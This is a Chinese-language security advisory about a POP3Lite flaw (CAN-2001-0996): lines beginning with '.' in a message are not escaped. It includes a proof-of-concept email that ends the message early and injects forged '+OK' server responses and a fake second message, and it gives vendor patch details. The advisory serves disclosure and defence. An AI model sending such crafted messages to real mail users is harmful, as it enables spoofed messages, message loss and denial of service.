发布日期：2001-09-03
更新日期：2001-09-11

受影响系统：

POP3Lite POP3Lite 0.2.3b
   - FreeBSD FreeBSD 5.0
   + Debian Linux 2.2r3 unstable
   + Debian Linux 2.2r3 testing
POP3Lite POP3Lite 0.2.3
   - FreeBSD FreeBSD 5.0
   + Debian Linux 2.2r3 unstable
   + Debian Linux 2.2r3 testing

不受影响系统：

POP3Lite POP3Lite 0.2.4
   - FreeBSD FreeBSD 5.0
   + Debian Linux 2.2r3 unstable
   + Debian Linux 2.2r3 testing

描述：

---

BUGTRAQ  ID: 3278
CVE(CAN) ID: CAN-2001-0996

POP3Lite是Linux和BSD平台下的免费，开放源代码的POP3守护程序。

发现POP3Lite没有过滤信件中以“.”开始的行，这至少可能导致意外情况的发生，如
果我们精心构造这封信件的内容，就可能导致把任意伪造的系统相应信息发送给从该服
务器上下载邮件的用户。

远程攻击者利用这个漏洞，可能插入任意信息或导致信息丢失，也可能导致匿名Email
攻击或者是拒绝服务攻击，这取决于客户端如何解释这些而已的输入。

<*来源：Daniel Roethlisberger （daniel@roe.ch）*>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Daniel Roethlisberger （daniel@roe.ch）提供了如下测试代码：

把下面的内容发给从有漏洞的服务器上下载邮件的用户：

  Date: Wed, 29 Aug 2001 19:31:41 -0400
  From: "Cash Plan" <cashplan62@hotmail.com>
  To: victim@victim.net
  Subject: DAILY CASH PLAN & COMPLETE BUSINESS SYSTEM

  Your DAILY CASH PLAN & COMPLETE BUSINESS SYSTEM
  THIS IS REAL !!  ON CD ROM!!

  ----FREE---------- FREE-------------- FREE--------------- FREE-----
  Stealth Mail Bomber " unlocked " No Registration Required
     Retails for $300 and up "This Bulk e-mail software will
                  ** EXPLODE YOUR BUSINESS **
  NO Tricks, NO Gimmicks, NO Changing Long Distance Carriers, NO Games
  ----FREE---------- FREE-------------- FREE--------------- FREE-----

  .
  +OK message deleted
  +OK 1234 octets
  Received: from mail.anything.com (123.123.123.123)
    by mail.victim.net with SMTP; 1 Apr 2001 00:42:00 -0000
  Date: Sat, 1 Apr 2001 00:23:00 -0000
  From: anyone@anything.com
  To: victim@victim.net
  Subject: anything

  bloerps


建议：

---

厂商补丁：

POP3Lite 0.2.4已经修正了这个问题，请立即到厂商的主页下载：

POP3Lite upgrade POP3Lite
ftp://pop3lite.sourceforge.net/pub/pop3lite/

Debian upgrade POP3Lite 0.4.2a-1 unstable
http://packages.debian.org/unstable/mail/pop3lite.html


浏览次数：8068
严重程度：0（网友投票）